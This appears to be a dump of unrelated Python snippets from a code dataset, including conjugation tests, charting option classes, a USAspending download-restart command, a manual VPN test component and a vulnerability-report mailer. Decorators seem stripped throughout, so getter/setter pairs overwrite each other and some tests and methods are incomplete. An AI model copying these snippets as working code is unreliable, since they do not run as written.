self.assertEqual(expected, conjugate.verb_is_tense(verb, tense))
([('1st', 'have', False), ('1st', 'swim', False), ('1st', 'give', False), ('1st', 'given', False), ('1st', 'am', True), ('1st', 'doing', False), ('1st', 'are', False), ('1st', 'had', False)])
def test_verb_is_present(self, person, verb, expected):
self.assertEqual(expected, conjugate.verb_is_present(verb, person=person))
([('have', False), ('swim', False), ('give', False), ('given', False), ('am', False), ('doing', True), ('are', False)])
def test_verb_is_present_participle(self, verb, expected):
self.assertEqual(expected, conjugate.verb_is_present_participle(verb))
([('1st', 'have', False), ('1st', 'swim', False), ('1st', 'give', False), ('1st', 'given', False), ('1st', 'am', False), ('1st', 'doing', False), ('1st', 'are', False), ('2nd', 'were', True)])
def test_verb_is_past(self, person, verb, expected):
self.assertEqual(expected, conjugate.verb_is_past(verb, person=person))
([('have', False), ('swimming', False), ('give', False), ('given', True), ('am', False), ('doing', False), ('are', False), ('had', False)])
def test_verb_is_past_participle(self, verb, expected):
self.assertEqual(expected, conjugate.verb_is_past_participle(verb))
([('have', ('have', 'has')), ('swimming', ('swimming', 'swimming')), ('give', ('give', 'gives')), ('given', ('given', 'given')), ('am', ('are', 'is')), ('doing', ('doing', 'doing')), ('are', ('are', 'is')), ('had', ('had', 'had')), ('grin', ('grin', 'grins')), ('smile', ('smile', 'smiles')), ('vex', ('vex', 'vexes')), ('thrust', ('thrust', 'thrusts'))])
def test_verb_actor_stance_components(self, verb, expected):
self.assertEqual(expected, conjugate.verb_actor_stance_components(verb)) |
(IDropHandler)
class FileDropHandler(HasTraits):
extensions = List(Str)
open_file = Callable
def can_handle_drop(self, event, target):
if event.mimeData().hasUrls():
for url in event.mimeData().urls():
file_path = url.toLocalFile()
if file_path.endswith(tuple(self.extensions)):
return True
return False
def handle_drop(self, event, target):
for url in event.mimeData().urls():
self.open_file(url.toLocalFile()) |
def _plotGaussianKDE(axes: 'Axes', plot_config: 'PlotConfig', data: 'DataFrame', label: str):
style = plot_config.histogramStyle()
sample_range = (data.max() - data.min())
indexes = numpy.linspace((data.min() - (0.5 * sample_range)), (data.max() + (0.5 * sample_range)), 1000)
gkde = gaussian_kde(data.values)
evaluated_gkde = gkde.evaluate(indexes)
lines = axes.plot(indexes, evaluated_gkde, linewidth=style.width, color=style.color, alpha=style.alpha)
if (len(lines) > 0):
plot_config.addLegendItem(label, lines[0]) |
class Command(BaseCommand):
help = ' '.join(["Restart a 'frozen' download job.", " (frozen signifies it didn't complete or fail, and is not a monthly download job)", 'Provide a DownloadJob ID or filename to restart the download process.', 'Depending on environment settings, this will either re-queue the download or process locally'])
def add_arguments(self, parser):
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-i', '--id', dest='download_job_id', type=int, help='A DownloadJob ID from a USAspending DB to restart a download')
group.add_argument('-f', '--filename', dest='file_name', type=str, help='A string to search on the final zip product filename of a DownloadJob to restart a download')
parser.add_argument('--force', action='store_true', help='Throw caution into the wind and force that DownloadJob file generation to restart!')
def handle(self, *args, **options):
logger.info('Beginning management command')
self.get_custom_arguments(**options)
self.download = DownloadAdministrator()
self.download.search_for_a_download(**self.get_custom_arguments(**options))
if (not options['force']):
self.validate_download_job()
self.download.restart_download_operation()
logger.info('OK')
def get_custom_arguments(**options):
return {field: value for (field, value) in options.items() if ((field in ['download_job_id', 'file_name']) and value)}
def validate_download_job(self):
if (self.download.download_job.job_status_id in [JOB_STATUS_DICT['finished'], JOB_STATUS_DICT['failed']]):
report_and_exit('DownloadJob invalid job_state_id: {}. Aborting'.format(self.download.download_job.job_status_id))
elif (self.download.download_job.monthly_download is True):
report_and_exit('DownloadJob is a monthly download. Aborting') |
def new_watched_window() -> Generator:
window_session = WindowSession({0: 1})
window_session.setup()
watcher = WindowWatcher(window_session.get_first_window())
watcher.start()
sleep(0.1)
(yield (window_session.get_first_window(), watcher))
watcher.stop()
window_session.destroy() |
class OptionPlotoptionsGaugeAccessibilityPoint(Options):
def dateFormat(self):
return self._config_get(None)
def dateFormat(self, text: str):
self._config(text, js_type=False)
def dateFormatter(self):
return self._config_get(None)
def dateFormatter(self, value: Any):
self._config(value, js_type=False)
def describeNull(self):
return self._config_get(True)
def describeNull(self, flag: bool):
self._config(flag, js_type=False)
def descriptionFormat(self):
return self._config_get(None)
def descriptionFormat(self, text: str):
self._config(text, js_type=False)
def descriptionFormatter(self):
return self._config_get(None)
def descriptionFormatter(self, value: Any):
self._config(value, js_type=False)
def valueDecimals(self):
return self._config_get(None)
def valueDecimals(self, num: float):
self._config(num, js_type=False)
def valueDescriptionFormat(self):
return self._config_get('{xDescription}{separator}{value}.')
def valueDescriptionFormat(self, text: str):
self._config(text, js_type=False)
def valuePrefix(self):
return self._config_get(None)
def valuePrefix(self, text: str):
self._config(text, js_type=False)
def valueSuffix(self):
return self._config_get(None)
def valueSuffix(self, text: str):
self._config(text, js_type=False) |
class OptionSeriesBellcurveSonificationTracksMappingTime(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def get_sizes_from_dtype(dtype):
if isinstance(dtype, str):
(head, props) = dtype.split('-')
if (head == 'fxp'):
if (props[0] == 's'):
signed = True
elif (props[0] == 'u'):
signed = False
else:
raise ValueError('dtype sign specifier should be `s` or `u`')
if ('-' in props):
(props, _) = props.split('-')
(n_word, n_frac) = props[1:].split('/')
n_word = int(n_word)
n_frac = int(n_frac)
else:
raise ValueError('dtype str format must be fxp-<sign><n_word>/<n_frac>-<complex>')
else:
raise ValueError('dtype must be a str!')
return (signed, n_word, n_frac) |
class Log():
def __init__(self, *args, **kwargs):
self.pc = kwargs['pc']
self.op = kwargs['op']
self.gas = kwargs['gas']
self.gas_cost = kwargs['gasCost']
self.memory = kwargs['memory']
self.memory_size = kwargs['memSize']
self.stack = kwargs['stack']
self.depth = kwargs['depth']
self.op_name = kwargs['opName']
self.error = kwargs['error'] |
class TASNode(Node):
def _basic_search_unit(self):
if (len(self.ancestors) == 2):
return Q(**{'tas_rendering_label__iregex': search_regex_of(self.code)})
elif (len(self.ancestors) == 1):
return Q(**{'federal_account__federal_account_code': self.code})
else:
return Q(**{'federal_account__parent_toptier_agency__toptier_code': self.code})
def clone(self, code, positive, positive_naics, negative_naics):
return TASNode(code, positive, positive_naics, negative_naics) |
class RandomAsyncUserSelector(AsyncUserSelector):
def __init__(self, data_provider: IFLDataProvider):
super().__init__(data_provider)
def get_random_user(self) -> AsyncUserSelectorInfo:
user_index = np.random.randint(0, self.data_provider.num_train_users())
return AsyncUserSelectorInfo(user_data=self.data_provider.get_train_user(user_index), user_index=user_index) |
class DynamoDBSchema(ConnectionConfigSecretsSchema):
region_name: str = Field(title='Region', description='The AWS region where your DynamoDB table is located (ex. us-west-2).')
aws_access_key_id: str = Field(title='Access Key ID', description='Part of the credentials that provide access to your AWS account.')
aws_secret_access_key: str = Field(title='Secret Access Key', description='Part of the credentials that provide access to your AWS account.', sensitive=True)
_required_components: List[str] = ['region_name', 'aws_access_key_id', 'aws_secret_access_key'] |
class OptionSeriesWindbarbMarker(Options):
def enabled(self):
return self._config_get(None)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def enabledThreshold(self):
return self._config_get(2)
def enabledThreshold(self, num: float):
self._config(num, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False)
def height(self):
return self._config_get(None)
def height(self, num: float):
self._config(num, js_type=False)
def lineColor(self):
return self._config_get('#ffffff')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(0)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(4)
def radius(self, num: float):
self._config(num, js_type=False)
def states(self) -> 'OptionSeriesWindbarbMarkerStates':
return self._config_sub_data('states', OptionSeriesWindbarbMarkerStates)
def symbol(self):
return self._config_get(None)
def symbol(self, text: str):
self._config(text, js_type=False)
def width(self):
return self._config_get(None)
def width(self, num: float):
self._config(num, js_type=False) |
class VPNApplication(Component):
def __init__(self, device, config):
super().__init__(device, config)
self._connected = True
def _get_ips(self, msg, max_ips=0):
msg = (msg + ' Press enter after each one. When finished, just press enter.')
ips = []
while 1:
ip_string = message_and_await_string(msg)
if (not ip_string):
break
try:
ips.append(ipaddress.ip_address(ip_string))
if ((max_ips != 0) and (len(ips) == max_ips)):
break
except (ipaddress.AddressValueError, ValueError) as ex:
L.warning('{}: invalid IP address. Please re-enter.'.format(ex))
if (not ips):
L.warning('User did not provide any valid IP addresses')
return ips
def open(self):
pass
def close(self):
message_and_await_enter('Close the VPN application')
def disconnect(self):
message_and_await_enter('Disconnect from the VPN')
def connect(self):
message_and_await_enter('Connect to the VPN')
def check_configuration(self, config):
message_and_await_yes_no('Is the VPN application configured as follows:\n{}'.format(config))
def wait_for_connection_interrupt_detection(self, timeout=65):
message_and_await_enter('Wait for the VPN application to detect a connection disruption then press enter')
def configure(self):
skip_settings = self._config.get('skip_settings', True)
settings = self._config.get('settings', {})
human_readable = settings.get('human_readable', None)
if (human_readable is not None):
L.describe('VPN application should be configured to {}'.format(human_readable))
elif settings:
L.describe('VPN application should be configured to {}'.format(settings))
if (not settings):
L.warning('No settings specified for VPN application. Using current settings.')
return
elif skip_settings:
L.warning('Configuring VPN application skipped as skip_settings=True')
return
msg = ''
for (key, value) in list(settings.items()):
msg += ' {} => {}\n'.format(key, value)
message_and_await_enter('Configure the VPN application with the following settings:\n{}'.format(msg))
def preferences(self):
L.warning("Can't automatically determine preferences for this VPN application")
return {}
def tunnel_interface(self):
return message_and_await_string('Please input the tunnel interface for the VPN or leave blank if unknown')
def vpn_processes(self):
L.warning("Can't automatically determine the VPN processes for this VPN application")
return []
def vpn_server_ip(self):
ips = self._get_ips('Please input the VPN server IP.', max_ips=1)
if (len(ips) > 1):
raise XVEx('User provided more than one VPN server IP')
if ips:
return ips[0]
return None
def dns_server_ips(self):
return self._get_ips('Please input the DNS server IPs you expect the VPN app to use.')
def tunnel_gateway(self):
return self._get_ips('Please input the tunnel gateway IP.')
def connection_state(self):
return ('connected' if self._connected else 'ready')
def protocol(self):
return message_and_await_string('Please input the VPN protocol or leave blank if unknown')
def open_and_connect(self):
self.open()
self.connect() |
def process_csv(csv_file):
conn = sqlite3.connect(':memory:')
c = conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS vulnerabilities (user TEXT, timestamp TEXT, appname TEXT, version_file TEXT, file_version TEXT, secure_version TEXT, cve TEXT)')
conn.commit()
with open(csv_file, newline='') as csvfile:
reader = csv.reader(csvfile, delimiter='|', quotechar='|')
for line in reader:
print(line)
user = line[0]
timestamp = line[1]
appname = line[2]
version_file = line[3]
version_file = version_file
file_version = line[4]
secure_version = line[5]
cve = line[6]
data = (user, timestamp, appname, version_file, file_version, secure_version, cve)
c.execute('INSERT INTO vulnerabilities VALUES (?,?,?,?,?,?,?)', data)
conn.commit()
c.execute('SELECT DISTINCT user FROM vulnerabilities')
users = c.fetchall()
for user in users:
t = (user[0],)
vulnerabilities = []
for vulnerability in c.execute('SELECT timestamp, appname, version_file, file_version, secure_version, cve FROM vulnerabilities WHERE user=?', t):
vulnerabilities.append(vulnerability)
send_email(user[0], vulnerabilities) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.